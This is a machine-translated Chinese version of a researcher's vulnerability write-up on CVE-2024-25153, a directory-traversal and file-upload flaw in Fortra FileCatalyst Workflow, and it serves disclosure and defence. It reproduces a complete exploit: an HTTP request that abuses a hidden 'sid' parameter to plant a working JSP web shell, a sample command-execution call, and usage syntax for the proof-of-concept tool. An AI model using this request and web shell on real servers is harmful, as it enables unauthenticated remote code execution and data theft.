CVE-2024-25153：Fortra FileCatalyst中的远程代码执行

alyssa

这篇文章为机翻文，部分内容翻译的可能不是很准确，建议阅读原文：https://labs.nettitude.com/blog/ ... ortra-filecatalyst/

漏洞介绍

CVE-2024-25153是Fortra FileCatalyst中的一个严重的不安全文件上传和目录遍历漏洞，允许未经身份验证的远程攻击者在 Web 服务器上获取远程代码执行 (RCE)。这会影响 5.1.6 Build 114 之前的 Fortra FileCatalyst Workflow 5.x。
我们正在发布针对此漏洞的完整概念验证漏洞，可以在下面的GitHub上找到。

1. <p>https://github.com/nettitude/CVE-2024-25153</p>

复制代码

Fortra FileCatalyst 是一种企业管理文件传输 (MFT) 解决方案，由多个组件组成 - FileCatalyst Direct、Workflow 和 Central。FileCatalyst Workflow包括一个 Web 门户，允许用户与组织中的任何人共享、修改和跟踪文件。

1. https://www.goanywhere.com/products/filecatalyst/filecatalyst-workflow

复制代码

过去 12 个月，托管文件传输 (MFT) 应用程序中发现了多个重大漏洞，例如CVE-2023-34362（MOVEit Transfer 应用程序中的 SQL 注入和远程执行代码漏洞）以及CVE-2024-0204（一个Fortra GoAnywhere 的身份验证绕过问题。

LRQA Nettitude 在对在外部基础设施中使用 Fortra FileCatalyst 的客户进行安全评估时发现了 CVE-2024-25153。本文包含对该漏洞及其发现的完整分析。


文件上传分析-FtpServlet

在 FileCatalyst 工作流程中，文件上传过程涉及对以下 URL 的 POST 请求。

1. https://{url}/workflow/servlet/ftpservlet

复制代码

下面是一个伪请求示例：

1. <p>POST /workflow/servlet/ftpservlet?wf=octetStream&r=&h=X&u=X&p=&prt=21&d=/&ff=X&b=X&fs=X&dlm=X&c=PUT HTTP/1.1</p><p>Host: {url}</p><p>Content-Type: application/octet-stream </p><p>Cookie: JSESSIONID={SESSION}</p><p>X-File-Type: image/png</p><p>X-File-Name: upload.png</p><p>
   
2. </p><p>{file contents}</p>

复制代码

尽管此请求需要会话令牌，但默认情况下，FileCatalyst Workflow允许公共用户匿名登录。此凭据或有效凭据是利用 CVE-2024-25153 的要求。



为了识别潜在的安全问题，我们从Fortra的公共网站下载并反编译了最新版本的FileCatalyst Workflow 。

1. https://filecatalyst.software/workflow.html

复制代码

如下所示，一些字符串被混淆，使得对应用程序进行逆向工程的任务更具挑战性。


目录遍历分析

通过检查错误消息，我们确定文件通常会上传到 Web 根目录中的以下位置。

1. https://{url}/workflow/uploadtemp/{session_id}/{file_name}

复制代码

但是，uploadtemp目录中的任何文件或文件夹都被明确拒绝公开访问，并且会话ID是随机生成的，用户不知道。

通常，攻击者会试图在X-File-Name请求标头中使用一系列点-点-斜杠（../）字符来跳到其他目标目录，但斜杠字符已被清除，因此不可能进行此攻击。



重要的是，我们观察到临时上传目录会在上传后不久被清理过程删除。确切的时间窗口取决于服务器端FTP连接完成所需的时间，这被认为足以进行潜在的攻击。

更重要的是，这意味着如果目录遍历成功，我们就无法在没有删除整个应用程序的风险的情况下定位顶级 Web 根目录。
在本地漏洞利用尝试期间，下面屏幕截图显示了这种不幸的影响。



如果在针对客户环境的安全评估期间尝试进行此攻击，则需要注意这一点。



识别隐藏参数

如果我们不能利用文件名字段中的目录遍历，我们如何才能将会话 ID 操纵为已知值？对这部分代码进行逆向工程揭示了以下功能，其中显示了一个可选查询参数 bb.decode(KVhV)，用于构造会话 ID。


正如前面提到的，这个字符串值被混淆了，我们必须逆向混淆函数来识别原始字符串，如下所示，这显示了sid请求参数。




上传命令执行脚本

通过将sid参数处替换为点-点-斜杠（../），我们能够将服务器端可执行文件shell.jsp上传到uploadtemp目录之外的位置。
对于读到这里的任何人来说，不要尝试将文件上传到顶级目录，这一点非常重要，因为这可能会删除整个应用程序。

1. <p>POST /workflow/servlet/ftpservlet?wf=octetStream&r=&h=X&u=X&p=&prt=21&d=/&ff=X&b=X&fs=X&dlm=X&c=PUT&sid=nettitude/../../nettitude/ HTTP/1.1</p><p>Host: {url}</p><p>Content-Type: application/octet-stream</p><p>Cookie: JSESSIONID={SESSION}</p><p>X-File-Type: a</p><p>X-File-Name: shell.jsp</p><p>
   
2. </p><p><%@ page import="java.util.*,java.io.*"%></p><p><HTML><BODY></p><p><FORM METHOD="GET" NAME="myform" ACTION=""></p><p><INPUT TYPE="text" NAME="cmd"></p><p><INPUT TYPE="submit" VALUE="Send"></p><p></FORM></p><p><pre></p><p><%</p><p>if (request.getParameter("cmd") != null) {</p><p>   out.println("Command: " + request.getParameter("cmd") + "<BR>");</p><p>   Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));</p><p>   OutputStream os = p.getOutputStream();</p><p>   InputStream in = p.getInputStream();</p><p>   DataInputStream dis = new DataInputStream(in);</p><p>   String disr = dis.readLine();</p><p>   while ( disr != null ) {</p><p>      out.println(disr);</p><p>      disr = dis.readLine();</p><p>   }</p><p>}</p><p>%></p><p></pre></p><p></BODY></HTML></p>

复制代码

上面的上传请求成功，并且 shell.jsp 被放置在 Web 目录中的以下位置：

1. https://{url}/workflow/nettitude/shell.jsp

复制代码

在实际环境中，应用程序可能需要不安全的权限才能在 Web 根目录中创建新目录。然而，在安全评估过程中观察到了这种配置，发现了 CVE-2024-25153，并且漏洞利用成功。

远程代码执行

上传 Webshell 后，就可以使用它来执行操作系统命令，如下所示：

1. <p>https://{url}/workflow/nettitude/shell.jsp?cmd=whoami</p><p>Response：</p><p>nt authority\local service</p>

复制代码

以上表明可以实现操作系统级别的访问，攻击者可以读取或修改系统上的数据，可能包括其他用户上传的文件。这带来了严重的机密性、完整性和可用性风险。

同样，在FileCatalyst Direct中，也观察到同样存在漏洞的 FtpServlet：

1. <p>https://www.goanywhere.com/products/filecatalyst/filecatalyst-direct</p><p>https://{url}:12480/servlet/ftpservlet</p>

复制代码

这似乎具有相同的功能，并且也被确定可以按照上述步骤进行利用。

概念验证漏洞利用

我们已经为 CVE-2024-25153 创建了完整的概念验证漏洞，可以在下面的 GitHub 上找到。
https://github.com/nettitude/CVE-2024-25153
要使用它，语法如下：

./CVE-2024-25153.py --host <hostname> --port <port> --url <url> --cmd <command>
该工具将执行以下操作：
自动检测是否启用匿名登录
获取有效的会话令牌
上传具有伪随机生成的文件名的命令执行脚本
执行操作系统命令
下面的屏幕截图演示了这一点。


披露流程

该漏洞于2023年8月7日发现，于2023年8月9日向Fortra报告，并于2023年8月11日发布有效补丁。Fortra于2023年12月被授权为CVE编号机构（CNA），此时CVE-2024-25153已分配并计划公开披露。